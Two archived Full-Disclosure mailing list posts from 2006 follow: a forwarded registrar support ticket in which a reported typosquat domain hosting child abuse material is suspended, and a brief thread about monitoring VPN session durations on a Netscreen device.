-Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] Sent: Saturday, April 15, 2006 12:19 AM To: [EMAIL PROTECTED] Subject: Closed Support Request Ticket No:109175 Your Support Request has been Closed. If your issue as described below is not yet resolved you may reopen this ticket by clicking below link - http://support.publicdomainregistry.com/support/servlet/TicketDetailServlet? ticketid=109175key=1439470749type=close You may call our Support Desk at anytime about this issue using the contact information provided on http://www.publicdomainregistry.com/contactus/. Remember to keep your ticket number (Ticket No: 109175) handy if you choose to call our Support Desk. Please take 10 extra seconds to rate our Support Response. This effort will help us improve our support processes and serve you better. Simply fill in the form below and hit the Submit button - Was this Support Request resolved to your satisfaction? YES NO Please rate the timeframe within which this Support Request was resolved. Excellent. I am happy with the time taken to resolve this request Satisfactory. I am satisfied with the time taken to resolve this request Poor. This Request took much more time than I would have anticipated, to get resolved Was our Support Staff friendly, polite and helpful to the extent they could be? Excellent. The Support staff was very friendly, polite, cheerful and helpful. Satisfactory. The Support staff was satisfactory in terms of politeness and were adequately helpful. Poor. The Support Staff was impolite and not helpful. I did not like the interaction. Support Request Details Ticket Number:109175 Category: Abuse Desk Subject: www.montspace.com: CHILD PORN HOSTED ON YOUR DOMAIN Priority: Emergency Date Created: Apr 14, 2006 11:53 PM GMT Date Last Modified: Apr 15, 2006 4:18 AM GMT On Apr 14, 2006 11:53 PM (GMT) Yohimba Wrote: Hi there. When typing www.myspace.com I typoed and typed www.montspace.com which is a page containing very obvious child pornography. The whois information conatins no information that is true except for the fact that it was obtained from your organization. Your page at http://www.publicdomainregistry.com/support-process/ does not work, it always returns that the security code is incorrect. PLEASE help with this, this is an extremely evil and bad site. On Apr 15, 2006 4:18 AM (GMT) Kevin Wrote: Hello, The problem that you have brought to our notice relates to how the domain name www.montspace.com is involved in CHILD PORNOGRAPHY. We are extremely strict and proactive with regards to our terms of usage. Pursuant to our terms of service we have SUSPENDED this domain name. For reporting any Abuse from a domain name registered with Registrar Directi.com, please send an e-mail to [EMAIL PROTECTED] Moreover, you may report Spam for domain names either Registered through Registrar DIRECT INFORMATION PVT LTD D/B/A PUBLICDOMAINREGISTRY.COM or Hosted on our Servers from our website at http://www.publicdomainregistry.com/contactus/report-spam/ and Whois Inaccuracy of domain names Registered through us at http://www.publicdomainregistry.com/contactus/report-false-whois/. Regards, Kevin. Rate this Response (Click) Poor http://support.publicdomainregistry.com/support/servlet/SetResponseVoteServ let?accesskey=18700corspid=328215ticketid=109175key=1439470749rating=1 Average http://support.publicdomainregistry.com/support/servlet/SetResponseVoteServ let?accesskey=18700corspid=328215ticketid=109175key=1439470749rating=2 Good http://support.publicdomainregistry.com/support/servlet/SetResponseVoteServ let?accesskey=18700corspid=328215ticketid=109175key=1439470749rating=3 Excellent http://support.publicdomainregistry.com/support/servlet/SetResponseVoteServ let?accesskey=18700corspid=328215ticketid=109175key=1439470749rating=4 Current Rating: None ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] LOOKING VPN TRAFIIC MONITRING SOFTWARE
well yes i am looking to monitor two end points ,durations,, actually i installed netscreen ISG and client is faccing problems in VPN there sessions for VPN drop after some time ,, so i need some software that i know the seesions and there durations best regards On Sat, 15 Apr 2006 03:05:40 -, adnan habib said: I am just looking for some software that i can monitor the traffic for VPN sessions or traffic,, I prefer if this software is free to download or some one can send me this software!!! What exactly were you trying to measure/monitor? Keep in mind that unless the software is co-located with one or the other endpoint of the VPN, the only thing you can see is that there's a connection, and it's carrying XYZ bytes of traffic. (Obviously, if *you* were able to monitor the traffic content itself at a midpoint, so could an evildoer - which would mean the VPN was worthless...) attach3 ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/